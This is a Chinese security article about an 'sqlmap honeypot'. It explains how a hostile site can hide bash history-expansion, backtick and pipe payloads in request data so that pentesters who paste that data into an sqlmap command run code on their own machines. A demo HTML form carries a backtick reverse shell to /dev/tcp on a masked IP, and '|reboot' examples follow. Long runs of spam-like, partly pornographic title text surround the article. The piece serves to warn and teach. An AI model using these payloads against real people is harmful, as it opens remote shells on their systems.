精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

注意了,使用Sqlmap的你可能踩中了“蜜罐”

安全 數(shù)據(jù)安全
你站在橋上看風(fēng)景,看風(fēng)景的人在樓上看你,明月裝飾了你的窗子,你裝飾了別人的夢。

Par0:楔子

你站在橋上看風(fēng)景,看風(fēng)景的人在樓上看你,

明月裝飾了你的窗子,你裝飾了別人的夢。

Par1:你要了解的事

滲透測試的同學(xué)應(yīng)該都知道,在Linux下,sqlmap執(zhí)行的語句大多是:

  1. Bash#sqlmap –u "http://sample.com/a=xxx&b=xxx" –data "postdata
  2. or 
  3. Bash#python sqlmap.py –u "http://sample.com/a=xxx&b=xxx" –cookie "cookedata

如此形式的語句執(zhí)行,實際上都是在shell中,執(zhí)行bash命令。

但是,bash命令中,一些使用幾率較小的特性,很多安全測試人員可能都不求甚解。

通過閱讀Bash參考手冊,可以了解到,在bash命令中,一些字符在封閉的雙引號中,有特殊的含義,并非所見即所得。

Enclosing characters in double quotes (‘"’)preserves the literal value of all characters within the quotes, with theexception of ‘$’, ‘`’, ‘\’, and, whenhistory expansion is enabled, ‘!’. When the shell is in POSIX mode (seeBash POSIX Mode),the ‘!’ hasno special meaning within double quotes, even when history expansion isenabled. The characters ‘$’ and ‘`’ retain theirspecial meaning within double quotes (see Shell Expansions).The backslash retains its special meaning only when followed by one of the followingcharacters: ‘$’, ‘`’, ‘"’, ‘\’, or newline. Within doublequotes, backslashes that are followed by one of these characters are removed.Backslashes preceding characters without a special meaning are left unmodified.A double quote may be quoted within double quotes by preceding it with abackslash. If enabled, history expansion will be performed unless an ‘!’ appearing indouble quotes is escaped using a backslash. The backslash preceding the ‘!’ is notremoved.

The special parameters ‘*’ and ‘@’ have specialmeaning when in double quotes (see Shell Parameter Expansion).

如果,懶著弄明白上面的意思,最好的辦法就是在自己的Linux中執(zhí)行相關(guān)的命令:

如ping “!!”,ping “`reboot`”,看看會產(chǎn)生怎樣神奇的效果

說的明白點,雙引號中的”!!”或者”!+數(shù)字”,會替換成歷史命令,執(zhí)行”history”命令,就可以知道哪些數(shù)字對應(yīng)哪些命令了。如果我將”!”放入到http請求中,而滲透測試人員執(zhí)行例如

  1. bash# sqlmap -u "www.asnine.com/test" --data"post!!request=hacked

首先雙引號中的!!會被替換成你最近執(zhí)行的一條歷史命令,然后在發(fā)送到webserver,如果webserver是惡意的,那么他就可以輕松的收集到你的bash中的歷史輸入了,也算是一種信息泄露吧。

如果僅僅是信息收集,危害還小一些,如果用”`”(數(shù)字1前面那個反單引號字符),可就厲害了。任何”`”之間的命令,都會被執(zhí)行,如果僅僅是為了好玩,一個reboot,就夠你受了,但是如果還有其他的想法,你的系統(tǒng)可就危在旦夕了

如果我將這些特殊的字符(“!” , “`”…)放到get/post/cookie等http請求參數(shù)中,萬一有人用sqlmap去對該網(wǎng)站進行安全測試,而注入?yún)?shù)正好包含了這些特殊字符,那么有意思的事情就產(chǎn)生了

此時,你通過攔截瀏覽器獲取的http post如果是惡意代碼

執(zhí)行:

  1. sqlmap –u "http://sample.com/a=xxx&b=xxx" –data "evilcode

結(jié)果就是,裝逼不成反被BI~

Par2:姑且稱之為sqlmap honeypot吧

現(xiàn)在,我的目的很單純,就是將特殊字符嵌入到http的請求數(shù)據(jù)中,以達(dá)到對滲透人員的反戈一擊。

要做到一個強力的反擊,首先需要將諸如”!”, “`”等字符串,放入http請求中。

而http請求,主要包括get request,cookie,post request三種。

大多時候,滲透人員通過獲取post數(shù)據(jù)作為sql的注入點,所以,要找到一種在post情況下的危險參數(shù)注入。

由于post數(shù)據(jù),可以構(gòu)造的相對比較復(fù)雜,很多時候,滲透人員只是將所有參數(shù)一股腦的作為sqlmap的data參數(shù)進行測試,所以可以很好的做到將危險參數(shù)嵌入到post data數(shù)據(jù)中,以達(dá)到隱藏自身的目的。

接下來,要做的就是如果滲透人員在通過利用例如Burp Suite等工具獲取sqlmap注入使用的參數(shù)時,獲取到的字符為未編碼的可見字符。

在用form進行提交數(shù)據(jù)時,如果添加enctype=”text/plain”屬性,那么,就可以做到可見即可得。

測試demo:

  1. html> 
  2. head> 
  3. title> A sqlmap honeypot demotitle> 
  4. head> 
  5. body> 
  6. input>search the userinput> 
  7. form id="myForm" action="username.html" method="post" enctype="text/plain"> 
  8. input type='hidden' name='name'value='Robin&id=4567&command=shell`bash -i >&/dev/tcp/192.168.xxx.xxx/2333 0>&1`&port=1234'/> 
  9. input type="button" value="Submit"> 
  10. form> 
  11. body> 
  12. html> 

訪問該頁面,進行查詢時,發(fā)送到請求為:

這時,很多沒有經(jīng)驗的安全滲透人員就可能將postdata,復(fù)制,粘貼,sqlmap執(zhí)行之:

Boom!

Par3:換個姿勢,再來一遍

前兩拍,為了所謂的神秘感,利用人們不常用的bash特性,強行裝了一波。

但是,既然利用場景是:

bash# exec "evil code"

那么事情可能會變得更加簡單。

使用過Linux的,大多數(shù)都用到過管道(|),而這個功能,能更好好的完成任務(wù)。

如果注入?yún)?shù)是:

"|reboot" (參數(shù)中包含雙引號)

那么執(zhí)行的命令則為:

bash# exec ""|reboot""

以上,我都假設(shè)的是,滲透人員將參數(shù)放入到雙引號(“)中。但使用管道,單引號的問題也迎刃而解

針對單引號,可以將注入?yún)?shù)設(shè)置為:

'|reboot'

Double Kill!

Par4:尾聲

以上都是我在測試一個網(wǎng)站時,其cookie中包含了

"!+number"

導(dǎo)致了sqlmap語句的執(zhí)行錯誤引起的。于是乎,深入追蹤了下,發(fā)現(xiàn)其實主要原因?qū)儆赽ash的特性。如果利用這個特性做惡,的確存在一定的安全風(fēng)險。

很多時候,我們并不能確保輸入數(shù)據(jù)安全性,尤其在使用sqlmap這種輸入?yún)?shù)來源于攻擊目標(biāo)的情況下。如果有人在獲取的參數(shù)(get/post/cookie)上動了手腳,滲透人員很可能偷雞不成拾把屎。

相信,只要理解了攻擊手段,很多人會構(gòu)造出更完美的攻擊數(shù)據(jù),這里就不獻丑了。

而且,偽裝到位的話,服務(wù)器甚至可以返回一些注入成功的信息

這個時候,sqlmap使用者,就有些悲劇了,他們沉浸在在成功的喜悅中,卻未料到背后隱藏的殺機

 

當(dāng)然,這種利用bash特性的攻擊方式,并不僅僅作用于sqlmap,也可能用于其它依賴于Linux命令行執(zhí)行的程序。Sqlmap只不過是這種特性的一個很好的利用場景。

責(zé)任編輯:趙寧寧 來源: 黑吧安全網(wǎng)
相關(guān)推薦

2017-02-07 10:40:36

2021-09-29 10:37:22

安全隱患蘋果系統(tǒng)漏洞

2018-06-01 09:11:23

2020-07-29 19:40:36

Vue 3.0Vue前端

2025-07-08 09:09:32

MySQL類型

2025-04-16 04:00:00

2021-10-25 22:48:53

手機電池中毒

2020-06-23 10:28:30

軟件研發(fā)交付

2020-11-20 07:54:22

Java 特性語句

2024-09-30 09:28:34

軟件研發(fā)交付

2024-04-10 08:39:56

BigDecimal浮點數(shù)二進制

2017-11-17 09:35:00

筆記本CPU中央處理器

2021-12-06 10:20:19

微信社交功能

2009-04-17 15:19:25

職場過時晚年

2013-09-17 13:52:00

工程師產(chǎn)品產(chǎn)品文案

2021-04-14 17:34:18

線程安全

2018-03-15 15:09:29

iOS圖片標(biāo)記蘋果

2024-01-09 08:08:32

元數(shù)據(jù)topicPulsar

2018-10-12 14:21:26

流量套餐運營商

2024-04-01 08:05:27

Go開發(fā)Java
點贊
收藏

51CTO技術(shù)棧公眾號

嗯啊主人调教在线播放视频| 99久久精品国产成人一区二区| 神马午夜久久| 在线免费观看一区| 日本不卡一区二区三区四区| 国产丰满果冻videossex| 亚洲日本黄色| 日韩在线视频线视频免费网站| 2025中文字幕| 欧美极品免费| 夜夜夜精品看看| 亚洲韩国青草视频| 亚洲一二三区av| 亚洲91av| 日本一区二区三区高清不卡| 99久久精品无码一区二区毛片| 秋霞精品一区二区三区| 一区二区影视| 亚洲欧洲日产国码av系列天堂| 特级黄色片视频| 伊人成综合网站| 亚洲欧美区自拍先锋| 欧美连裤袜在线视频| 国内精品国产成人国产三级| 日韩av中文在线观看| 韩国精品久久久999| 日韩在线视频免费看| 亚洲欧美日本伦理| 精品久久久久久综合日本欧美 | 在线日本视频| 91一区一区三区| 99久久精品久久久久久ai换脸| 国产精品无码粉嫩小泬| 国产亚洲一级| 久久久综合免费视频| 在线观看天堂av| 国产日产一区 | avtt中文字幕| 欧美日韩黄网站| 欧美美女喷水视频| 国产精品久久a| 日韩精品免费观看视频| 色先锋久久av资源部| 免费看又黄又无码的网站| 手机在线免费av| 亚洲美女少妇撒尿| 伊人狠狠色丁香综合尤物| 超碰免费在线| 欧美国产精品v| 日韩精品久久久毛片一区二区| 日本韩国一区| www亚洲一区| 欧美激情专区| 精品久久久久一区二区三区| 久久午夜国产精品| 欧美日韩视频在线一区二区观看视频| 天天综合天天综合| 久久新电视剧免费观看| 日本不卡免费新一二三区| 日本在线视频1区| 久久久精品日韩欧美| 日韩精品一区二区三区色偷偷| 国产在线观看免费网站| 久久精品欧美日韩| 亚洲开发第一视频在线播放| 欧美天天影院| 亚洲激情自拍偷拍| 成人性免费视频| 欧美xxx网站| 欧美日韩精品免费| 日本r级电影在线观看| 亚洲午夜免费| 日韩av资源在线播放| 日本高清www| 欧美日韩激情| 成人444kkkk在线观看| 日本一本高清视频| 日韩精品乱码免费| 91精品中文在线| 蜜臀av在线观看| 91丨九色丨尤物| 一本久道久久综合| 色综合999| 一本大道久久精品懂色aⅴ| 欧美午夜aaaaaa免费视频| 国产精品中文| 日韩电影中文 亚洲精品乱码| 亚洲女优在线观看| 女人色偷偷aa久久天堂| 97婷婷大伊香蕉精品视频| 中文字幕在线天堂| 国产福利91精品| 欧美理论一区二区| 日本三级韩国三级欧美三级| 色综合久久天天综合网| 亚洲天堂av一区二区| 国偷自产视频一区二区久| 亚洲午夜国产成人av电影男同| caoporn91| 国产一级一区二区| 91亚洲精品在线观看| 人人九九精品| 亚洲精选视频在线| 久久国产亚洲精品无码| 亚洲ww精品| 亚洲精品视频免费| 九九在线观看视频| 日本vs亚洲vs韩国一区三区二区 | 自拍偷拍精品| 欧美大片va欧美在线播放| 亚洲 欧美 中文字幕| 国产精品1区2区3区| 少妇免费毛片久久久久久久久| 日韩123区| 欧美人牲a欧美精品| 91精品人妻一区二区三区蜜桃欧美| 一区二区免费不卡在线| 国产精品91在线观看| 色窝窝无码一区二区三区| 日韩美女视频一区二区| 不卡av免费在线| 风间由美中文字幕在线看视频国产欧美 | 国产成人一区| 亚洲18私人小影院| 精品国精品国产自在久不卡| 国产精品美女视频| 老司机午夜av| 中国av一区| 97色在线视频| 黄色片网站免费在线观看| 最新欧美精品一区二区三区| 欧美日韩在线成人| 香蕉一区二区| 91a在线视频| 天天操天天干天天| 亚洲乱码中文字幕| 日韩高清在线一区二区| 欧美大片aaaa| 91精品久久久久| 午夜在线免费观看视频| 在线观看欧美日本| 熟女少妇内射日韩亚洲| 久久久亚洲人| 欧美日韩国产综合视频在线| 校园春色亚洲| 日韩激情片免费| 日本韩国欧美中文字幕| 91丨九色丨蝌蚪丨老版| 欧美日韩激情视频在线观看| 奇米777国产一区国产二区| 国内成人精品一区| 日韩中文字幕综合| 黄色成人在线播放| 亚洲中文字幕无码av| 国产亚洲高清视频| 麻豆成人小视频| 日韩欧美看国产| 国产亚洲精品综合一区91| 看黄色一级大片| 欧美经典一区二区三区| 思思久久精品视频| 欧美精品18| 激情小说综合区| 在线中文字幕播放| 中文字幕亚洲欧美日韩在线不卡 | 欧美黄色aaa| 国产黑丝在线一区二区三区| 黄色三级中文字幕| 日韩三区视频| 国产精品电影久久久久电影网| 99青草视频在线播放视| 在线成人午夜影院| 精品在线视频观看| 久久人人97超碰com| 国产高清视频网站| 小说区亚洲自拍另类图片专区| 999热视频在线观看| av中文在线资源库| 一本色道久久综合狠狠躁篇怎么玩| www.久久网| 亚洲精品中文字幕乱码三区| 精品视频站长推荐| 热久久久久久久| 轻点好疼好大好爽视频| 在线成人动漫av| 国产日产亚洲精品| 国产理论电影在线| 亚洲天堂一区二区三区| 国产免费久久久| 午夜视频一区二区三区| 国内精品卡一卡二卡三| 国产一区久久久| 高清在线观看免费| 91久久久精品国产| 麻豆av一区| 免费欧美网站| 国产精品白丝jk喷水视频一区| 在线播放蜜桃麻豆| 亚洲一区二区国产| 国产成人三级在线观看视频| 欧美亚洲国产一区二区三区va| 黄色在线观看免费| 国产欧美一区二区三区在线看蜜臀| 下面一进一出好爽视频| 日韩一级电影| 国产美女久久久| 精品人人视频| 久久97久久97精品免视看 | 国产午夜精品一区二区三区视频| 日本亚洲一区二区三区| 青青草成人在线观看| 亚洲 自拍 另类小说综合图区| 我不卡手机影院| 茄子视频成人在线观看| 乱亲女h秽乱长久久久| 91人人爽人人爽人人精88v| 中文在线中文资源| 久久久久中文字幕| 在线h片观看| 久久这里有精品视频| 97电影在线| 精品网站999www| 人妻91麻豆一区二区三区| 欧美日韩国产首页在线观看| 中文字幕免费高清网站| 精品久久久久久亚洲国产300| 欧美精品成人久久| 亚洲日本欧美天堂| 色哟哟一一国产精品| 国产精品欧美精品| 亚洲v国产v欧美v久久久久久| av一二三不卡影片| 亚洲图片综合网| 成人av网址在线| 一二三区视频在线观看| 国产米奇在线777精品观看| 一起操在线视频| 美国毛片一区二区| 亚洲这里只有精品| 秋霞电影一区二区| 五月婷婷激情久久| 青青草国产成人av片免费| 国产视频手机在线播放| 日韩高清不卡在线| 亚洲综合欧美激情| 狠狠久久亚洲欧美| 夜夜爽久久精品91| 国产精品中文欧美| 国产清纯白嫩初高中在线观看性色| 国产精品一区在线观看你懂的| 天堂在线精品视频| 国产在线精品一区二区三区不卡| 亚洲妇熟xx妇色黄蜜桃| 国产一区二区在线观看视频| 在线观看欧美一区二区| 福利91精品一区二区三区| 亚洲精品国产成人av在线| 92精品国产成人观看免费| 精品久久久久久中文字幕人妻最新| 久久只精品国产| 一级在线观看视频| 亚洲欧洲成人精品av97| 欧美激情精品久久| 欧美日韩国产色| 樱花视频在线免费观看| 欧美日韩和欧美的一区二区| 国产精品国产三级国产aⅴ| 欧美一级生活片| 色噜噜在线播放| 亚洲人成电影在线播放| 国产调教视频在线观看| 欧美精品成人在线| 欧美成人a交片免费看| 国产伊人精品在线| 999久久久精品一区二区| 久久精品一区二区三区不卡免费视频| 欧美日韩精品在线一区| 欧美三级午夜理伦三级老人| 亚洲精品美女| 中文久久久久久| 国产成人久久精品77777最新版本 国产成人鲁色资源国产91色综 | 亚洲国产99精品国自产| 国产中文字幕在线视频| 欧美xxxx做受欧美| 亚洲天堂资源| 亚洲最大成人免费视频| 一本久久青青| 黄色一级片av| 久久先锋影音| 国产ts在线观看| 日本一区二区三区久久久久久久久不| 激情小说中文字幕| 在线免费不卡视频| 亚洲国产成人精品一区二区三区| 亚洲欧美日韩精品久久奇米色影视 | 91麻豆精品一二三区在线| 国产专区一区二区| 99久久久久| 国产淫片av片久久久久久| 国产精品自拍一区| 免费看黄色三级| 精品久久久久久久久久ntr影视| 91精品国产综合久| 亚洲欧美一区二区三区久久| 欧美精品videossex少妇| 国产精品jizz在线观看麻豆| 一级毛片精品毛片| 在线不卡视频一区二区| 性色av一区二区怡红| 男人添女人荫蒂国产| 国产精品久久久久久久第一福利 | 黑人另类av| 最新国产精品久久久| 91香蕉视频导航| 91麻豆文化传媒在线观看| 日本黄色小说视频| 欧美精三区欧美精三区| 精品乱码一区二区三四区视频 | 日韩综合在线观看| 亚洲成人动漫在线播放| 影音先锋男人在线资源| 国产主播欧美精品| 九九视频精品全部免费播放| 丰满的少妇愉情hd高清果冻传媒 | 在线一区二区三区| 天天操天天爱天天干| 欧美激情亚洲综合一区| 精品一区二区三区亚洲| 中文字幕剧情在线观看一区| 久久九九99| 亚洲一区二区观看| 精品毛片三在线观看| 丰满人妻一区二区三区无码av | 亚洲欧洲精品在线观看| 久久久久久一区二区| 亚洲男人在线天堂| 黄色成人在线播放| 污污网站免费在线观看| 7777免费精品视频| 精品国产乱子伦一区二区| 很污的网站在线观看| 99这里只有久久精品视频| 精品91久久久| 日韩国产高清视频在线| 91久久国产综合久久91猫猫| 久久久国产精品一区二区三区| 日韩午夜高潮| 亚洲av片不卡无码久久| 欧美性xxxxxxx| 国产小视频在线| 国产成人精品在线播放| 色综合蜜月久久综合网| 男生操女生视频在线观看| 亚洲欧美二区三区| 精品国产亚洲av麻豆| 97视频国产在线| 亚洲+小说+欧美+激情+另类| 看欧美ab黄色大片视频免费| 亚洲国产精华液网站w| 国产精品久久久久久免费播放 | 亚洲精品国产精品国产| 欧美下载看逼逼| 久久精品国产999大香线蕉| 999精品视频在线观看播放| 日韩欧美三级在线| 天堂а√在线最新版中文在线| 欧美日韩国产综合在线| 久久电影网站中文字幕| 波多野结衣家庭教师| 亚洲第一区在线| 日韩av福利| av电影一区二区三区| 波多野结衣一区二区三区| 神马久久久久久久| 久久伊人色综合| 国产精品乱战久久久| 久久午夜夜伦鲁鲁一区二区| 国产精品国产馆在线真实露脸| 国产a级免费视频| 欧美一级在线亚洲天堂| 四季av一区二区凹凸精品| 日本精品一二三| 欧美系列一区二区| 七七久久电影网| 日韩啊v在线| 国内精品伊人久久久久av影院 | 欧美午夜电影在线播放| 中文字幕在线播放网址| 欧美高清视频一区| 国产美女视频91| 无码人妻熟妇av又粗又大| 欧美精品性视频| 精品国产a一区二区三区v免费| 台湾佬美性中文| 欧洲亚洲精品在线| 国产激情视频在线看| 国产精品无码乱伦| 久久久国产精品麻豆| 亚洲产国偷v产偷v自拍涩爱| 国产精品18久久久久久麻辣|